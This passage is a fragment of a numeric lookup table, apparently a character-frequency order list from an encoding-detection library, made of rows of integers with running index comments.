1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856
2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872
1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888
2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904
1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920
1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936
1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952
1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968
1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984
1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000
606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016
684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032
1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048
2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064
2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080
2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096
3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112
3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128
884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144
3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160
1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876, 78,2287,1482,1277, # 2176
861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192
2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208
1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224
576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240
3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256
4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272
2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288
1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304
2601,1919,1078, 75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320
1075, 292,3818,1756,2602, 317, 98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336
385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352
178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368
1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384
2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400
2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416
2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432
3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448
1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464
2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480
359,2291,1676, 73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496
837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512
855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528
1209, 96, 587,2166,1032, 260,1072,2153, 173, 94, 226,3244, 819,2006,4642,4114, # 2544
2203, 231,1744, 782, 97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560
633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576
1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592
1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608
353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624
1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640
1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656
1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672
764,2861,1853, 688,2429,1920,1462, 77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688
2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704
278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720
2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736
3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752
2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768
1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784
6147, 441, 762,1771,3447,3607,3608,1904, 840,3037, 86, 939,1385, 572,1370,2445, # 2800
1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816
2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832
1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848
470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864
72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880
3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896
3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912
1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928
1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944
1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960
1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976
123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992
913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008
2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024
900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040
3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056
2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072
423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088
1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104
2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120
220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136
1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152
745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168
4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184
2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200
1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216
666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232
1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248
2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264
376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280
6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296
1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312
1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328
2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344
3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360
914,2550,2587, 81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376
3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392
1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408
674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424
1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440
199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456
3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472
370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488
2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504
414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520
4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536
2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552
1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568
1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584
1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600
166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616
1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632
3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648
1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664
3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680
264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696
543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712
983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728
2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744
1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760
867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776
1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792
894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808
1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824
530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840
839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856
480,2083,1774,3458, 923,2279,1350, 221,3086, 85,2233,2234,3835,1585,3010,2147, # 3872
1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888
1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904
2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920
4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936
227,1351,1645,2453,2193,1421,2887, 812,2121, 634, 95,2435, 201,2312,4665,1646, # 3952
1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968
328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984
1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000
3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016
1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032
2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048
2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064
1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080
1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096
2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112
455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128
2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144
1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160
1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176
1279,2136,1697,2335, 204, 721,2097,3838, 90,6186,2085,2505, 191,3967, 124,2148, # 4192
1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208
3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224
2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240
2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256
575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272
3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288
3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304
1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320
2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336
1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352
2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368 #last 512
#Everything below is of no interest for detection purpose
2138,2122,3730,2888,1995,1820,1044,6190,6191,6192,6193,6194,6195,6196,6197,6198, # 4384
6199,6200,6201,6202,6203,6204,6205,4670,6206,6207,6208,6209,6210,6211,6212,6213, # 4400
6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,6224,6225,6226,6227,6228,6229, # 4416
6230,6231,6232,6233,6234,6235,6236,6237,3187,6238,6239,3969,6240,6241,6242,6243, # 4432
6244,4671,6245,6246,4672,6247,6248,4133,6249,6250,4364,6251,2923,2556,2613,4673, # 4448
4365,3970,6252,6253,6254,6255,4674,6256,6257,6258,2768,2353,4366,4675,4676,3188, # 4464
4367,3463,6259,4134,4677,4678,6260,2267,6261,3842,3332,4368,3543,6262,6263,6264, # 4480
3013,1954,1928,4135,4679,6265,6266,2478,3091,6267,4680,4369,6268,6269,1699,6270, # 4496
3544,4136,4681,6271,4137,6272,4370,2804,6273,6274,2593,3971,3972,4682,6275,2236, # 4512
4683,6276,6277,4684,6278,6279,4138,3973,4685,6280,6281,3258,6282,6283,6284,6285, # 4528
3974,4686,2841,3975,6286,6287,3545,6288,6289,4139,4687,4140,6290,4141,6291,4142, # 4544
6292,6293,3333,6294,6295,6296,4371,6297,3399,6298,6299,4372,3976,6300,6301,6302, # 4560
4373,6303,6304,3843,3731,6305,4688,4374,6306,6307,3259,2294,6308,3732,2530,4143, # 4576
6309,4689,6310,6311,6312,3048,6313,6314,4690,3733,2237,6315,6316,2282,3334,6317, # 4592
6318,3844,6319,6320,4691,6321,3400,4692,6322,4693,6323,3049,6324,4375,6325,3977, # 4608
6326,6327,6328,3546,6329,4694,3335,6330,4695,4696,6331,6332,6333,6334,4376,3978, # 4624
6335,4697,3979,4144,6336,3980,4698,6337,6338,6339,6340,6341,4699,4700,4701,6342, # 4640
6343,4702,6344,6345,4703,6346,6347,4704,6348,4705,4706,3135,6349,4707,6350,4708, # 4656
6351,4377,6352,4709,3734,4145,6353,2506,4710,3189,6354,3050,4711,3981,6355,3547, # 4672
3014,4146,4378,3735,2651,3845,3260,3136,2224,1986,6356,3401,6357,4712,2594,3627, # 4688
3137,2573,3736,3982,4713,3628,4714,4715,2682,3629,4716,6358,3630,4379,3631,6359, # 4704
6360,6361,3983,6362,6363,6364,6365,4147,3846,4717,6366,6367,3737,2842,6368,4718, # 4720
2628,6369,3261,6370,2386,6371,6372,3738,3984,4719,3464,4720,3402,6373,2924,3336, # 4736
4148,2866,6374,2805,3262,4380,2704,2069,2531,3138,2806,2984,6375,2769,6376,4721, # 4752
4722,3403,6377,6378,3548,6379,6380,2705,3092,1979,4149,2629,3337,2889,6381,3338, # 4768
4150,2557,3339,4381,6382,3190,3263,3739,6383,4151,4723,4152,2558,2574,3404,3191, # 4784
6384,6385,4153,6386,4724,4382,6387,6388,4383,6389,6390,4154,6391,4725,3985,6392, # 4800
3847,4155,6393,6394,6395,6396,6397,3465,6398,4384,6399,6400,6401,6402,6403,6404, # 4816
4156,6405,6406,6407,6408,2123,6409,6410,2326,3192,4726,6411,6412,6413,6414,4385, # 4832
4157,6415,6416,4158,6417,3093,3848,6418,3986,6419,6420,3849,6421,6422,6423,4159, # 4848
6424,6425,4160,6426,3740,6427,6428,6429,6430,3987,6431,4727,6432,2238,6433,6434, # 4864
4386,3988,6435,6436,3632,6437,6438,2843,6439,6440,6441,6442,3633,6443,2958,6444, # 4880
6445,3466,6446,2364,4387,3850,6447,4388,2959,3340,6448,3851,6449,4728,6450,6451, # 4896
3264,4729,6452,3193,6453,4389,4390,2706,3341,4730,6454,3139,6455,3194,6456,3051, # 4912
2124,3852,1602,4391,4161,3853,1158,3854,4162,3989,4392,3990,4731,4732,4393,2040, # 4928
4163,4394,3265,6457,2807,3467,3855,6458,6459,6460,3991,3468,4733,4734,6461,3140, # 4944
2960,6462,4735,6463,6464,6465,6466,4736,4737,4738,4739,6467,6468,4164,2403,3856, # 4960
6469,6470,2770,2844,6471,4740,6472,6473,6474,6475,6476,6477,6478,3195,6479,4741, # 4976
4395,6480,2867,6481,4742,2808,6482,2493,4165,6483,6484,6485,6486,2295,4743,6487, # 4992
6488,6489,3634,6490,6491,6492,6493,6494,6495,6496,2985,4744,6497,6498,4745,6499, # 5008
6500,2925,3141,4166,6501,6502,4746,6503,6504,4747,6505,6506,6507,2890,6508,6509, # 5024
6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,3469,4167,6520,6521,6522,4748, # 5040
4396,3741,4397,4749,4398,3342,2125,4750,6523,4751,4752,4753,3052,6524,2961,4168, # 5056
6525,4754,6526,4755,4399,2926,4169,6527,3857,6528,4400,4170,6529,4171,6530,6531, # 5072
2595,6532,6533,6534,6535,3635,6536,6537,6538,6539,6540,6541,6542,4756,6543,6544, # 5088
6545,6546,6547,6548,4401,6549,6550,6551,6552,4402,3405,4757,4403,6553,6554,6555, # 5104
4172,3742,6556,6557,6558,3992,3636,6559,6560,3053,2726,6561,3549,4173,3054,4404, # 5120
6562,6563,3993,4405,3266,3550,2809,4406,6564,6565,6566,4758,4759,6567,3743,6568, # 5136
4760,3744,4761,3470,6569,6570,6571,4407,6572,3745,4174,6573,4175,2810,4176,3196, # 5152
4762,6574,4177,6575,6576,2494,2891,3551,6577,6578,3471,6579,4408,6580,3015,3197, # 5168
6581,3343,2532,3994,3858,6582,3094,3406,4409,6583,2892,4178,4763,4410,3016,4411, # 5184
6584,3995,3142,3017,2683,6585,4179,6586,6587,4764,4412,6588,6589,4413,6590,2986, # 5200
6591,2962,3552,6592,2963,3472,6593,6594,4180,4765,6595,6596,2225,3267,4414,6597, # 5216
3407,3637,4766,6598,6599,3198,6600,4415,6601,3859,3199,6602,3473,4767,2811,4416, # 5232
1856,3268,3200,2575,3996,3997,3201,4417,6603,3095,2927,6604,3143,6605,2268,6606, # 5248
3998,3860,3096,2771,6607,6608,3638,2495,4768,6609,3861,6610,3269,2745,4769,4181, # 5264
3553,6611,2845,3270,6612,6613,6614,3862,6615,6616,4770,4771,6617,3474,3999,4418, # 5280
4419,6618,3639,3344,6619,4772,4182,6620,2126,6621,6622,6623,4420,4773,6624,3018, # 5296
6625,4774,3554,6626,4183,2025,3746,6627,4184,2707,6628,4421,4422,3097,1775,4185, # 5312
3555,6629,6630,2868,6631,6632,4423,6633,6634,4424,2414,2533,2928,6635,4186,2387, # 5328
6636,4775,6637,4187,6638,1891,4425,3202,3203,6639,6640,4776,6641,3345,6642,6643, # 5344
3640,6644,3475,3346,3641,4000,6645,3144,6646,3098,2812,4188,3642,3204,6647,3863, # 5360
3476,6648,3864,6649,4426,4001,6650,6651,6652,2576,6653,4189,4777,6654,6655,6656, # 5376
2846,6657,3477,3205,4002,6658,4003,6659,3347,2252,6660,6661,6662,4778,6663,6664, # 5392
6665,6666,6667,6668,6669,4779,4780,2048,6670,3478,3099,6671,3556,3747,4004,6672, # 5408
6673,6674,3145,4005,3748,6675,6676,6677,6678,6679,3408,6680,6681,6682,6683,3206, # 5424
3207,6684,6685,4781,4427,6686,4782,4783,4784,6687,6688,6689,4190,6690,6691,3479, # 5440
6692,2746,6693,4428,6694,6695,6696,6697,6698,6699,4785,6700,6701,3208,2727,6702, # 5456
3146,6703,6704,3409,2196,6705,4429,6706,6707,6708,2534,1996,6709,6710,6711,2747, # 5472
6712,6713,6714,4786,3643,6715,4430,4431,6716,3557,6717,4432,4433,6718,6719,6720, # 5488
6721,3749,6722,4006,4787,6723,6724,3644,4788,4434,6725,6726,4789,2772,6727,6728, # 5504
6729,6730,6731,2708,3865,2813,4435,6732,6733,4790,4791,3480,6734,6735,6736,6737, # 5520
4436,3348,6738,3410,4007,6739,6740,4008,6741,6742,4792,3411,4191,6743,6744,6745, # 5536
6746,6747,3866,6748,3750,6749,6750,6751,6752,6753,6754,6755,3867,6756,4009,6757, # 5552
4793,4794,6758,2814,2987,6759,6760,6761,4437,6762,6763,6764,6765,3645,6766,6767, # 5568
3481,4192,6768,3751,6769,6770,2174,6771,3868,3752,6772,6773,6774,4193,4795,4438, # 5584
3558,4796,4439,6775,4797,6776,6777,4798,6778,4799,3559,4800,6779,6780,6781,3482, # 5600
6782,2893,6783,6784,4194,4801,4010,6785,6786,4440,6787,4011,6788,6789,6790,6791, # 5616
6792,6793,4802,6794,6795,6796,4012,6797,6798,6799,6800,3349,4803,3483,6801,4804, # 5632
4195,6802,4013,6803,6804,4196,6805,4014,4015,6806,2847,3271,2848,6807,3484,6808, # 5648
6809,6810,4441,6811,4442,4197,4443,3272,4805,6812,3412,4016,1579,6813,6814,4017, # 5664
6815,3869,6816,2964,6817,4806,6818,6819,4018,3646,6820,6821,4807,4019,4020,6822, # 5680
6823,3560,6824,6825,4021,4444,6826,4198,6827,6828,4445,6829,6830,4199,4808,6831, # 5696
6832,6833,3870,3019,2458,6834,3753,3413,3350,6835,4809,3871,4810,3561,4446,6836, # 5712
6837,4447,4811,4812,6838,2459,4448,6839,4449,6840,6841,4022,3872,6842,4813,4814, # 5728
6843,6844,4815,4200,4201,4202,6845,4023,6846,6847,4450,3562,3873,6848,6849,4816, # 5744
4817,6850,4451,4818,2139,6851,3563,6852,6853,3351,6854,6855,3352,4024,2709,3414, # 5760
4203,4452,6856,4204,6857,6858,3874,3875,6859,6860,4819,6861,6862,6863,6864,4453, # 5776
3647,6865,6866,4820,6867,6868,6869,6870,4454,6871,2869,6872,6873,4821,6874,3754, # 5792
6875,4822,4205,6876,6877,6878,3648,4206,4455,6879,4823,6880,4824,3876,6881,3055, # 5808
4207,6882,3415,6883,6884,6885,4208,4209,6886,4210,3353,6887,3354,3564,3209,3485, # 5824
2652,6888,2728,6889,3210,3755,6890,4025,4456,6891,4825,6892,6893,6894,6895,4211, # 5840
6896,6897,6898,4826,6899,6900,4212,6901,4827,6902,2773,3565,6903,4828,6904,6905, # 5856
6906,6907,3649,3650,6908,2849,3566,6909,3567,3100,6910,6911,6912,6913,6914,6915, # 5872
4026,6916,3355,4829,3056,4457,3756,6917,3651,6918,4213,3652,2870,6919,4458,6920, # 5888
2438,6921,6922,3757,2774,4830,6923,3356,4831,4832,6924,4833,4459,3653,2507,6925, # 5904
4834,2535,6926,6927,3273,4027,3147,6928,3568,6929,6930,6931,4460,6932,3877,4461, # 5920
2729,3654,6933,6934,6935,6936,2175,4835,2630,4214,4028,4462,4836,4215,6937,3148, # 5936
4216,4463,4837,4838,4217,6938,6939,2850,4839,6940,4464,6941,6942,6943,4840,6944, # 5952
4218,3274,4465,6945,6946,2710,6947,4841,4466,6948,6949,2894,6950,6951,4842,6952, # 5968
4219,3057,2871,6953,6954,6955,6956,4467,6957,2711,6958,6959,6960,3275,3101,4843, # 5984
6961,3357,3569,6962,4844,6963,6964,4468,4845,3570,6965,3102,4846,3758,6966,4847, # 6000
3878,4848,4849,4029,6967,2929,3879,4850,4851,6968,6969,1733,6970,4220,6971,6972, # 6016
6973,6974,6975,6976,4852,6977,6978,6979,6980,6981,6982,3759,6983,6984,6985,3486, # 6032
3487,6986,3488,3416,6987,6988,6989,6990,6991,6992,6993,6994,6995,6996,6997,4853, # 6048
6998,6999,4030,7000,7001,3211,7002,7003,4221,7004,7005,3571,4031,7006,3572,7007, # 6064
2614,4854,2577,7008,7009,2965,3655,3656,4855,2775,3489,3880,4222,4856,3881,4032, # 6080
3882,3657,2730,3490,4857,7010,3149,7011,4469,4858,2496,3491,4859,2283,7012,7013, # 6096
7014,2365,4860,4470,7015,7016,3760,7017,7018,4223,1917,7019,7020,7021,4471,7022, # 6112
2776,4472,7023,7024,7025,7026,4033,7027,3573,4224,4861,4034,4862,7028,7029,1929, # 6128
3883,4035,7030,4473,3058,7031,2536,3761,3884,7032,4036,7033,2966,2895,1968,4474, # 6144
3276,4225,3417,3492,4226,2105,7034,7035,1754,2596,3762,4227,4863,4475,3763,4864, # 6160
3764,2615,2777,3103,3765,3658,3418,4865,2296,3766,2815,7036,7037,7038,3574,2872, # 6176
3277,4476,7039,4037,4477,7040,7041,4038,7042,7043,7044,7045,7046,7047,2537,7048, # 6192
7049,7050,7051,7052,7053,7054,4478,7055,7056,3767,3659,4228,3575,7057,7058,4229, # 6208
7059,7060,7061,3660,7062,3212,7063,3885,4039,2460,7064,7065,7066,7067,7068,7069, # 6224
7070,7071,7072,7073,7074,4866,3768,4867,7075,7076,7077,7078,4868,3358,3278,2653, # 6240
7079,7080,4479,3886,7081,7082,4869,7083,7084,7085,7086,7087,7088,2538,7089,7090, # 6256
7091,4040,3150,3769,4870,4041,2896,3359,4230,2930,7092,3279,7093,2967,4480,3213, # 6272
4481,3661,7094,7095,7096,7097,7098,7099,7100,7101,7102,2461,3770,7103,7104,4231, # 6288
3151,7105,7106,7107,4042,3662,7108,7109,4871,3663,4872,4043,3059,7110,7111,7112, # 6304
3493,2988,7113,4873,7114,7115,7116,3771,4874,7117,7118,4232,4875,7119,3576,2336, # 6320
4876,7120,4233,3419,4044,4877,4878,4482,4483,4879,4484,4234,7121,3772,4880,1045, # 6336
3280,3664,4881,4882,7122,7123,7124,7125,4883,7126,2778,7127,4485,4486,7128,4884, # 6352
3214,3887,7129,7130,3215,7131,4885,4045,7132,7133,4046,7134,7135,7136,7137,7138, # 6368
